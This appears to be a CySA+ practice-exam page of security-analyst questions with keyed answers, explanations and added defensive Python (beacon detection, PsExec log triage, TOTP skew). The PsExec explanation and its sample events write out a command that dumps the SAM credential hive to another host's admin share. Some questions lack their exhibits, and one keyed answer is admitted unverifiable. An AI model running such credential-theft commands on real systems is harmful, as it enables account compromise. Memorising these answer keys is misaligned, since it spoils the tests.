dependencies, the organization can plan more effectively for changes and minimize the risk of
unintended consequences that could lead to system failures.
F) Ensure that all assets are properly listed in the inventory management system: Maintaining
an accurate and comprehensive inventory of assets is fundamental in change management.
Knowing exactly what assets the organization possesses and their characteristics allows for
better planning and impact analysis when changes are made. This ensures that no critical
component is overlooked during the change process, reducing the risk of failures due to
incomplete information.
Other Options:
A) Ensure users document system recovery plan prior to deployment: While documenting a
system recovery plan is important, it's more related to disaster recovery and business continuity
planning than directly reducing the impact of system failures due to changes.
B) Perform a full system-level backup following the change: While backups are essential, they
are generally a reactive measure to recover from a failure, rather than a proactive measure to
reduce the impact of system failures in the first place.
C) Leverage an audit tool to identify changes that are being made: While using an audit tool is
helpful for tracking changes and ensuring compliance, it is not directly linked to reducing the
impact of system failures due to changes.
E) Require diagrams to be completed for all critical systems: While having diagrams of critical
systems is useful for understanding and managing them, it is not a direct method for reducing
the impact of system failures due to changes. Diagrams are more about documentation and
understanding rather than proactive change management.
36. Following an attack, an analyst needs to provide a summary of the event to the Chief
Information Security Officer. The summary needs to include the who-what-when information and
evaluate the effectiveness of the plans in place.
Which of the following incident management life cycle processes
does this describe?
A. Business continuity plan
B. Lessons learned
C. Forensic analysis
D. Incident response plan
Answer: B
Explanation:
The lessons learned process is the final stage of the incident management life cycle, where the
incident team reviews the incident and evaluates the effectiveness of the response and the
plans in place. The lessons learned report should include the who-what-when information and
any recommendations for improvement [1][2][3].
Reference: [1] What is incident management? Steps, tips, and best practices; [2] 5 Steps of the
Incident Management Lifecycle | RSI Security; [3] Navigating the Incident Response Life Cycle: A
Comprehensive Guide
37. A systems administrator is reviewing after-hours traffic flows from data-center servers and
sees regular outgoing HTTPS connections from one of the servers to a public IP address. The
server should not be making outgoing connections after hours. Looking closer, the administrator
sees this traffic pattern around the clock during work hours as well.
Which of the following is the most likely explanation?
A. C2 beaconing activity
B. Data exfiltration
C. Anomalous activity on unexpected ports
D. Network host IP address scanning
E. A rogue network device
Answer: A
Explanation:
The most likely explanation for this traffic pattern is C2 beaconing activity. C2 stands for
command and control, which is a phase of the Cyber Kill Chain that involves the adversary
attempting to establish communication with a successfully exploited target. C2 beaconing
activity is a type of network traffic that indicates a compromised system is sending periodic
messages or signals to an attacker’s system using various protocols, such as HTTP(S), DNS,
ICMP, or UDP. C2 beaconing activity can enable the attacker to remotely control or manipulate
the target system or network using various methods, such as malware callbacks, backdoors,
botnets, or covert channels.
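The traffic pattern in this question (regular outbound HTTPS connections, around the clock, from a server that should not be making them) is what a beacon looks like in flow data. As an added example that is not part of the original page, the following Python groups flow records by (source, destination, port) and flags channels whose inter-arrival times are too regular to be human. The flow records are constructed inline: one server beaconing every 300 seconds with a few seconds of jitter for a full day, and one pulling updates at irregular times. The thresholds (at least 10 connections, coefficient of variation at most 0.1) are assumptions to tune for your environment.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta


def build_sample_flows():
    """Constructed flow records (not from the original page): (start, src, dst, dport, bytes_out)."""
    base = datetime(2024, 1, 1, 0, 0, 0)
    flows = []
    # 10.0.0.5 beacons to 203.0.113.9:443 every 300 s with a few seconds of jitter,
    # 288 times, i.e. around the clock for a full day.
    jitter = [0, 3, -2, 5, -4, 1, -1, 4, -3, 2, 0, -5]
    for i in range(288):
        t = base + timedelta(seconds=300 * i + jitter[i % len(jitter)])
        flows.append((t, "10.0.0.5", "203.0.113.9", 443, 1200))
    # 10.0.0.7 pulls updates from a mirror at irregular, human/cron-shaped times.
    gaps = [0, 120, 3900, 60, 7200, 15, 300, 10800, 45, 600, 30, 5400]
    t = base
    for g in gaps:
        t += timedelta(seconds=g)
        flows.append((t, "10.0.0.7", "198.51.100.20", 443, 48000))
    return flows


def channel_stats(flows, min_count=10):
    """Per (src, dst, dport): count, mean interval, coefficient of variation, hours of day seen."""
    by_channel = defaultdict(list)
    for start, src, dst, dport, _ in flows:
        by_channel[(src, dst, dport)].append(start)
    stats = {}
    for key, times in by_channel.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        # Coefficient of variation: spread of the intervals relative to their mean.
        # Machine-driven check-ins sit near 0; human-driven traffic is far above it.
        cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
        stats[key] = {
            "count": len(times),
            "mean_interval_s": round(mean, 1),
            "cv": round(cv, 3),
            "hours_of_day": len({t.hour for t in times}),
        }
    return stats


def find_beacons(flows, min_count=10, max_cv=0.1):
    """Channels whose inter-arrival times are regular enough to look machine-driven."""
    return {k: v for k, v in channel_stats(flows, min_count).items() if v["cv"] <= max_cv}


if __name__ == "__main__":
    for channel, s in find_beacons(build_sample_flows()).items():
        print(channel, s)
```

The hours_of_day figure is what separates the "around the clock" pattern in the question from a legitimate scheduled job that runs only in a maintenance window. Real implants often randomise their sleep interval by 20 percent or more, so in practice the CV threshold has to be looser and should be combined with other features, such as near-constant response sizes and a destination no other host talks to.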
38. A security analyst is reviewing the following alert that was triggered by FIM on a critical
system:
Which of the following best describes the suspicious activity that is occurring?
A. A fake antivirus program was installed by the user.
B. A network drive was added to allow exfiltration of data
C. A new program has been set to execute on system start
D. The host firewall on 192.168.1.10 was disabled.
Answer: C
Explanation:
A new program has been set to execute on system start is the most likely cause of the
suspicious activity that is occurring, as it indicates that the malware has modified the registry
keys of the system to ensure its persistence. File Integrity Monitoring (FIM) is a tool that
monitors changes to files and registry keys on a system and alerts the security analyst of any
unauthorized or malicious modifications. The alert triggered by FIM shows that the malware has
created a new registry key under the Run subkey, which is used to launch programs
automatically when the system starts. The new registry key points to a file named “update.exe”
in the Temp folder, which is likely a malicious executable disguised as a legitimate update file.
Official
Reference: https://www.comptia.org/blog/the-new-comptia-cybersecurity-analyst-your-questions-
answered
https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002-exam-
objectives
https://www.comptia.org/training/books/cysa-cs0-002-study-guide
39. A company that has a geographically diverse workforce and dynamic IPs wants to
implement a vulnerability scanning method with reduced network traffic.
Which of the following would best meet this requirement?
A. External
B. Agent-based
C. Non-credentialed
D. Credentialed
Answer: B
Explanation:
Agent-based vulnerability scanning is a method that involves installing software agents on the
target systems or networks that can perform local scans and report the results to a central
server or console. Agent-based vulnerability scanning can reduce network traffic, as the scans
are performed locally and only the results are transmitted over the network. Agent-based
vulnerability scanning can also provide more accurate and up-to-date results, as the agents can
scan continuously or on-demand, regardless of the system or network status or location.
41. There are several reports of sensitive information being disclosed via file sharing services.
The company would like to improve its security posture against this threat.
Which of the following security controls would best support the company in this scenario?
A. Implement step-up authentication for administrators
B. Improve employee training and awareness
C. Increase password complexity standards
D. Deploy mobile device management
Answer: B
Explanation:
The best security control to implement against sensitive information being disclosed via file
sharing services is to improve employee training and awareness. Employee training and
awareness can help educate employees on the risks and consequences of using file sharing
services for sensitive information, as well as the policies and procedures for handling such
information securely and appropriately. Employee training and awareness can also help foster a
security culture and encourage employees to report any incidents or violations of information
security.
42. A company brings in a consultant to make improvements to its website. After the consultant
leaves. a web developer notices unusual activity on the website and submits a suspicious file
containing the following code to the security team:
43. An incident response analyst is taking over an investigation from another analyst. The
investigation has been going on for the past few days.
Which of the following steps is most important during the transition between the two analysts?
A. Identify and discuss the lessons learned with the prior analyst.
B. Accept all findings and continue to investigate the next target.
C. Review the steps that the previous analyst followed.
D. Validate the root cause from the prior analyst.
Answer: C
Explanation:
Reviewing the steps that the previous analyst followed is the most important step during the
transition, as it ensures continuity and consistency of the investigation. It also helps the new
analyst to understand the current status, scope, and findings of the investigation, and to avoid
repeating the same actions or missing any important details. The other options are either less
important, premature, or potentially biased.
Reference: CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 4: Incident Response
and Management, page 191. Incident response best practices and tips, Tip 1: Always pack a
jump bag.
44. Legacy medical equipment, which contains sensitive data, cannot be patched.
Which of the following is the best solution to improve the equipment's security posture?
A. Move the legacy systems behind a WAF.
B. Implement an air gap for the legacy systems.
C. Place the legacy systems in the perimeter network.
D. Implement a VPN between the legacy systems and the local network.
Answer: B
Explanation:
Implementing an air gap for the legacy systems is the best solution to improve their security
posture. An air gap is a physical separation of a system or network from any other system or
network that may pose a threat. An air gap can prevent any unauthorized access or data
transfer between the isolated system or network and the external environment. Implementing an
air gap for the legacy systems can help to protect them from being exploited by attackers who
may take advantage of their unpatched vulnerabilities.
45. Which of the following threat actors is most likely to target a company due to its
questionable environmental policies?
A. Hacktivist
B. Organized crime
C. Nation-state
D. Lone wolf
Answer: A
Explanation:
Hacktivists are threat actors who use cyberattacks to promote a social or political cause, such
as environmentalism, human rights, or democracy. They may target companies that they
perceive as violating their values or harming the public interest. Hacktivists often use techniques
such as defacing websites, launching denial-of-service attacks, or leaking sensitive data to
expose or embarrass their targets [1][2].
Reference: [1] An introduction to the cyber threat environment, page 3; [2] What is a Threat
Actor? Types & Examples of Cyber Threat Actors, section 2.
46. An organization's email account was compromised by a bad actor. Given the following
Information:
Which of the following is the length of time the team took to detect the threat?
A. 25 minutes
B. 40 minutes
C. 45 minutes
D. 2 hours
Answer: A
Explanation:
Time to detect is measured from the first malicious activity (the phishing emails being sent)
to the moment the security team identified it. Taking the times quoted here, emails sent at
8:30 a.m. and the help desk alerted by recipients at 8:45 a.m., the interval is 15 minutes,
which does not match any of the options. The exhibit containing the full timeline is not
reproduced on this page, so the keyed answer of 25 minutes cannot be checked against it. When
working the question, note that the end point is the time the security team identified the
compromise, which may be later than the first user report to the help desk.
47. A development team is preparing to roll out a beta version of a web application and wants to
quickly test for vulnerabilities, including SQL injection, path traversal, and cross-site scripting.
Which of the following tools would the security team most likely recommend to perform this test?
A. Hashcat
B. OpenVAS
C. OWASP ZAP
D. Nmap
Answer: C
Explanation:
OWASP ZAP (Zed Attack Proxy) is a tool recommended for quickly testing web applications for
vulnerabilities, including SQL injection, path traversal, and cross-site scripting. It is an open-
source web application security scanner that helps identify security issues in web applications
during the development and testing phases.
50. Which of the following would eliminate the need for different passwords for a variety of
internal applications?
A. CASB
B. SSO
C. PAM
D. MFA
Answer: B
Explanation:
Single Sign-On (SSO) allows users to log in with a single ID and password to access multiple
applications. It eliminates the need for different passwords for various internal applications,
streamlining the authentication process.
51. A security analyst is analyzing the following output from the Spider tab of OWASP ZAP after
a vulnerability scan was completed:
Which of the following options can the analyst conclude based on the provided output?
A. The scanning vendor used robots to make the scanning job faster
B. The scanning job was successfully completed, and no vulnerabilities were detected
C. The scanning job did not successfully complete due to an out of scope error
D. The scanner executed a crawl process to discover pages to be assessed
Answer: D
Explanation:
The output shows the result of using OWASP ZAP’s Spider tab after a vulnerability scan was
completed. The Spider tab allows users to crawl web applications and discover pages and
resources that can be assessed for vulnerabilities. The output shows that the scanner
discovered various pages under different directories, such as /admin/, /blog/, /contact/, etc., as
well as some parameters and forms that can be used for testing inputs and outputs.
Reference: CompTIA Cybersecurity Analyst
(CySA+) Certification Exam Objectives (CS0-002), page 9;
https://www.zaproxy.org/docs/desktop/start/features/spider/
52. A security analyst has identified a new malware file that has impacted the organization. The
malware is polymorphic and has built-in conditional triggers that require a connection to the
internet. The CPU has an idle process of at least 70%.
Which of the following best describes how the security analyst can effectively review the
malware without compromising the organization's network?
A. Utilize an RDP session on an unused workstation to evaluate the malware.
B. Disconnect and utilize an existing infected asset off the network.
C. Create a virtual host for testing on the security analyst workstation.
D. Subscribe to an online service to create a sandbox environment.
Answer: D
Explanation:
A sandbox environment is a safe and isolated way to analyze malware without affecting the
organization’s network. An online service can provide a sandbox environment without requiring
the security analyst to set up a virtual host or use an RDP session. Disconnecting and using an
existing infected asset is risky and may not provide accurate results.
Reference: Malware Analysis: Steps & Examples, Dynamic Analysis
53. The SOC received a threat intelligence notification indicating that an employee's credentials
were found on the dark web. The user's web and log-in activities were reviewed for malicious or
anomalous connections, data uploads/downloads, and exploits. A review of the controls
confirmed multifactor authentication was enabled.
Which of the following should be done first to mitigate impact to the business networks and
assets?
A. Perform a forced password reset.
B. Communicate the compromised credentials to the user.
C. Perform an ad hoc AV scan on the user's laptop.
D. Review and ensure privileges assigned to the user's account reflect least privilege.
E. Lower the thresholds for SOC alerting of suspected malicious activity.
Answer: A
Explanation:
The first and most urgent step to mitigate the impact of compromised credentials on the dark
web is to perform a forced password reset for the affected user. This will prevent the
cybercriminals from using the stolen credentials to access the company’s network and
systems. Multifactor authentication is a good security measure, but it is not foolproof and can be
bypassed by sophisticated attackers. Therefore, changing the password as soon as possible is
the best practice to reduce the risk of a data breach or other cyber attack [1][2][3].
Reference: [1] How to monitor the dark web for compromised employee credentials; [2] How to
prevent corporate credentials ending up on the dark web; [3] Data Breach Prevention: Identifying
Leaked Credentials on the Dark Web
55. A security analyst is validating a particular finding that was reported in a web application
vulnerability scan to make sure it is not a false positive.
The security analyst uses the snippet below:
56. While reviewing system logs, a network administrator discovers the following entry:
Which of the following occurred?
A. An attempt was made to access a remote workstation.
B. The PsExec services failed to execute.
C. A remote shell failed to open.
D. A user was trying to download a password file from a remote system.
Answer: D
Explanation:
The output shows a log entry indicating that a user attempted to pull a password file from a
remote system using PsExec. PsExec is a Sysinternals command-line tool that executes processes
on remote systems. The entry shows the user "administrator" running PsExec with the following
parameters:
\\192.168.1.100 -u administrator -p P@ssw0rd -c cmd.exe /c type c:\windows\system32\config\SAM > \\192.168.1.101\c$\temp\sam.txt
This connects to the remote system 192.168.1.100 with the username "administrator" and the
password "P@ssw0rd" (-u and -p), copies the named program to the remote system (-c), and runs
cmd.exe /c with the command "type c:\windows\system32\config\SAM >
\\192.168.1.101\c$\temp\sam.txt". That command attempts to read the SAM hive, which holds the
hashed passwords of local accounts, and write it to the administrative share of a third system,
192.168.1.101. Two points a practitioner should note: the SAM hive is held open by the operating
system while Windows is running, so a plain type of the file normally fails (attackers typically
use reg save, a volume shadow copy, or a credential-dumping tool instead), and the plaintext
password on the command line is now recorded in process-creation logs on both hosts and should
be treated as compromised.
Reference: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002),
page 8; https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
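The log exhibit for this question is not reproduced on the page, but the explanation gives the command line, which is enough to show the detection logic a SOC would run over process-creation events. The following Python is an added example, not from the original page: it takes command lines as an EDR or Sysmon Event ID 1 would record them and flags PsExec lateral movement, explicit credentials on the command line, and access to the SAM/SYSTEM/SECURITY hives or to administrative shares. The first event uses the command line from the explanation; the other two events, the host and user names, and the severity scheme are constructed.

```python
import re

# Constructed sample events (the page's log exhibit is not reproduced here): process
# command lines as an EDR or Sysmon Event ID 1 would record them.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": r"CORP\administrator",
     "cmd": r"psexec.exe \\192.168.1.100 -u administrator -p P@ssw0rd -c cmd.exe /c "
            r"type c:\windows\system32\config\SAM > \\192.168.1.101\c$\temp\sam.txt"},
    {"host": "WS02", "user": r"CORP\svc_deploy",
     "cmd": r"psexec64.exe \\fileserver01 -s -c install_agent.exe /quiet"},
    {"host": "WS03", "user": r"CORP\jdoe",
     "cmd": r"notepad.exe C:\Users\jdoe\notes.txt"},
]

PSEXEC_RE = re.compile(r"(?:^|[\\/\s])psexec(?:64)?\.exe\s+\\\\(?P<target>\S+)", re.I)
CRED_HIVE_RE = re.compile(r"\\config\\(?:sam|system|security)\b", re.I)
ADMIN_SHARE_RE = re.compile(r"\\\\(?P<host>[^\\\s]+)\\(?:c\$|admin\$)", re.I)
PLAINTEXT_CRED_RE = re.compile(r"(?:^|\s)-u\s+\S+.*(?:^|\s)-p\s+\S+", re.I)
WRITE_RE = re.compile(r">|\b(?:copy|xcopy|robocopy)\b", re.I)


def analyze_command(cmd):
    """Return {'target', 'findings', 'severity'} for one process command line."""
    findings = []
    target = None
    psexec = PSEXEC_RE.search(cmd)
    if psexec:
        target = psexec.group("target")
        findings.append("remote execution via PsExec against " + target)
        if PLAINTEXT_CRED_RE.search(cmd):
            findings.append("explicit credentials passed on the command line (-u/-p)")
        if re.search(r"(?:^|\s)-c\s+\S+", cmd):
            findings.append("-c copies a local executable to the target before running it")
    hive = bool(CRED_HIVE_RE.search(cmd))
    if hive:
        findings.append("reads a registry hive that stores credentials (SAM/SYSTEM/SECURITY)")
    share = ADMIN_SHARE_RE.search(cmd)
    share_write = bool(share and WRITE_RE.search(cmd))
    if share_write:
        findings.append("writes output to an administrative share on " + share.group("host"))
    # Credential-hive access or staging data on an admin share is a credential-theft /
    # lateral-movement pattern; bare PsExec use is common for admins and only worth a look.
    if hive or share_write:
        severity = "high"
    elif psexec:
        severity = "medium"
    else:
        severity = "none"
    return {"target": target, "findings": findings, "severity": severity}


def triage(events):
    """Return the events that warrant a look, highest severity first, with their findings."""
    order = {"high": 0, "medium": 1}
    out = []
    for ev in events:
        result = analyze_command(ev["cmd"])
        if result["severity"] != "none":
            out.append({**ev, **result})
    return sorted(out, key=lambda r: order[r["severity"]])


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["severity"].upper(), hit["host"], hit["user"])
        for f in hit["findings"]:
            print("   -", f)
```

Because PsExec is legitimately used by administrators, the rule rates plain remote execution as medium and reserves high for the combination that matters here: a credential hive being read and the result staged on another host's admin share. Any -p value the rule catches should be queued for a forced reset, since it has been written to the event log in clear text.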
57. An analyst is designing a message system for a bank. The analyst wants to include a
feature that allows the recipient of a message to prove to a third party that the message came
from the sender.
Which of the following information security goals is the analyst most likely trying to achieve?
A. Non-repudiation
B. Authentication
C. Authorization
D. Integrity
Answer: A
Explanation:
Non-repudiation is the property that the sender of a message cannot later deny having sent it,
and that the recipient can demonstrate the message's origin to a third party. That is exactly the
feature described, and it is typically achieved with digital signatures, where the sender signs
with a private key that only the sender holds. Non-repudiation is a fundamental requirement of
secure messaging in banking and financial communications, for legal as well as security
reasons. Note that a message authentication code based on a shared secret would not provide it,
because the recipient holds the same key and could have produced the message itself.
58. A cybersecurity analyst is tasked with scanning a web application to understand where the
scan will go and whether there are URIs that should be denied access prior to more in-depth
scanning.
Which of following best fits the type of scanning activity requested?
A. Uncredentialed scan
B. Discovery scan
C. Vulnerability scan
D. Credentialed scan
Answer: B
Explanation:
A discovery scan is a type of web application scanning that involves identifying active, internet-
facing web applications and their URIs, without performing any intrusive or in-depth tests. This
type of scan can help to understand the scope and structure of a web application before
conducting more comprehensive vulnerability scans [1][2].
Reference: [1] OWASP Vulnerability Scanning Tools; [2] CISA Web Application Scanning
59. Which of the following will most likely cause severe issues with authentication and logging?
A. Virtualization
B. Multifactor authentication
C. Federation
D. Time synchronization
Answer: D
Explanation:
Time synchronization issues can cause severe problems with authentication and logging. If
system clocks are not properly synchronized, it can lead to discrepancies in log timestamps,
making it difficult to correlate events across different systems. Additionally, time-related
discrepancies can affect authentication mechanisms that rely on time-based tokens, such as
those used in multifactor authentication, leading to failures and security gaps.
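To show how much clock skew a time-based one-time password actually tolerates, here is an added example (not part of the original page) implementing RFC 4226 HOTP and RFC 6238 TOTP with the standard library and simulating a client whose clock is off. The 20-byte secret is the one used in the RFC 6238 test vectors, so the codes can be checked against the published values; the server time and the one-step verification window are assumptions.

```python
import hashlib
import hmac
import struct


def hotp(secret, counter, digits=6, algo=hashlib.sha1):
    """RFC 4226 HOTP: HMAC over the big-endian counter, dynamic truncation, mod 10^digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret, unix_time, step=30, digits=6, algo=hashlib.sha1):
    """RFC 6238 TOTP: HOTP with the counter derived from the clock."""
    return hotp(secret, int(unix_time) // step, digits, algo)


def verify_totp(secret, code, server_time, step=30, window=1, digits=6):
    """Accept the current step and up to `window` steps either side, with constant-time compare."""
    counter = int(server_time) // step
    return any(
        hmac.compare_digest(hotp(secret, c, digits), code)
        for c in range(counter - window, counter + window + 1)
    )


def login_with_skew(secret, client_skew_s, server_time, step=30, window=1):
    """Simulate a client whose clock is off by client_skew_s seconds; True if the login succeeds."""
    code = totp(secret, server_time + client_skew_s, step)
    return verify_totp(secret, code, server_time, step, window)


def max_tolerated_skew(secret, server_time, step=30, window=1, limit=600):
    """Largest positive skew (seconds) that still authenticates at this server time."""
    ok = 0
    for skew in range(0, limit + 1):
        if login_with_skew(secret, skew, server_time, step, window):
            ok = skew
        else:
            break
    return ok


if __name__ == "__main__":
    secret = b"12345678901234567890"          # RFC 6238 test-vector secret
    now = 1_700_000_000                        # assumed server time (20 s into a 30 s step)
    for skew in (0, 20, 40, 95):
        print("skew %3d s -> %s" % (skew, "accepted" if login_with_skew(secret, skew, now) else "rejected"))
    print("max skew tolerated right now:", max_tolerated_skew(secret, now), "s")
```

With the usual one-step window the server accepts a code at most 30 to 59 seconds out, depending on where in the step the request lands, which is why a server drifting by a couple of minutes makes every MFA login fail. The same clock discipline matters for logging: a host whose clock is wrong produces events that cannot be placed in order against the rest of the fleet, so NTP health belongs on the same monitoring dashboard as authentication failures.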
60. The security team reviews a web server for XSS and runs the following Nmap scan:
Which of the following most accurately describes the result of the scan?
A. An output of characters > and " as the parameters used in the attempt
B. The vulnerable parameter ID http://172.31.15.2/1.php?id=2 and unfiltered characters returned
C. The vulnerable parameter and unfiltered or encoded characters passed > and " as unsafe
D. The vulnerable parameter and characters > and " with a reflected XSS attempt
Answer: D
Explanation:
A cross-site scripting (XSS) attack is a type of web application attack that injects malicious code
into a web page that is then executed by the browser of a victim user. A reflected XSS attack is
a type of XSS attack where the malicious code is embedded in a URL or a form parameter that
is sent to the web server and then reflected back to the user’s browser. In this case, the Nmap
scan shows that the web server is vulnerable to a reflected XSS attack, as it returns the
characters > and " without any filtering or encoding. The vulnerable parameter is id in the URL
http://172.31.15.2/1.php?id=2.
61. During the forensic analysis of a compromised machine, a security analyst discovers some
binaries that are exhibiting abnormal behaviors. After extracting the strings, the analyst finds
unexpected content.
Which of the following is the next step the analyst should take?
A. Validate the binaries' hashes from a trusted source.
B. Use file integrity monitoring to validate the digital signature
C. Run an antivirus against the binaries to check for malware.
D. Only allow binaries on the approved list to execute.
Answer: A
Explanation:
Validating the binaries’ hashes from a trusted source is the next step the analyst should take
after discovering some binaries that are exhibiting abnormal behaviors and finding unexpected
content in their strings. A hash is a fixed-length value that uniquely represents the contents of a
file or message. By comparing the hashes of the binaries on the compromised machine with the
hashes of the original or legitimate binaries from a trusted source, such as the software vendor
or repository, the analyst can determine whether the binaries have been modified or replaced by
malicious code. If the hashes do not match, it indicates that the binaries have been tampered
with and may contain malware.
63. An organization was compromised, and the usernames and passwords of all employees
were leaked online.
Which of the following best describes the remediation that could reduce the impact of this
situation?
A. Multifactor authentication
B. Password changes
C. System hardening
D. Password encryption
Answer: B
Explanation:
Forcing a password change for every affected account is the remediation that most directly
reduces the impact of this leak: once the passwords are rotated, the leaked credentials no longer
grant access, regardless of who has obtained them. The other options are sound long-term
controls, but none of them by itself invalidates the exposed passwords. Multifactor
authentication would limit what an attacker can do with a valid password, but it takes time to
roll out and the leaked passwords remain valid until they are changed; system hardening does
not address credentials at all; and encrypting (or properly hashing) stored passwords protects
against a future disclosure, not the one that has already happened.
Reference: CompTIA CySA+ Certification Exam Objectives, [What Is Multifactor Authentication
(MFA)?]
64. Which of the following describes the difference between intentional and unintentional insider
threats?
A. Their access levels will be different
B. The risk factor will be the same
C. Their behavior will be different
D. The rate of occurrence will be the same
Answer: C
Explanation:
The difference between intentional and unintentional insider threats is their behavior. Intentional
insider threats are malicious actors who deliberately misuse their access to harm the
organization or its assets. Unintentional insider threats are careless or negligent users who
accidentally compromise the security of the organization or its assets. Their access levels, risk
factors, and rates of occurrence may vary depending on various factors, but their behavior is the
main distinction.
Reference: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002),
page 12;
https://www.cisa.gov/sites/default/files/publications/Insider_Threat_Mitigation_Guide_508.pdf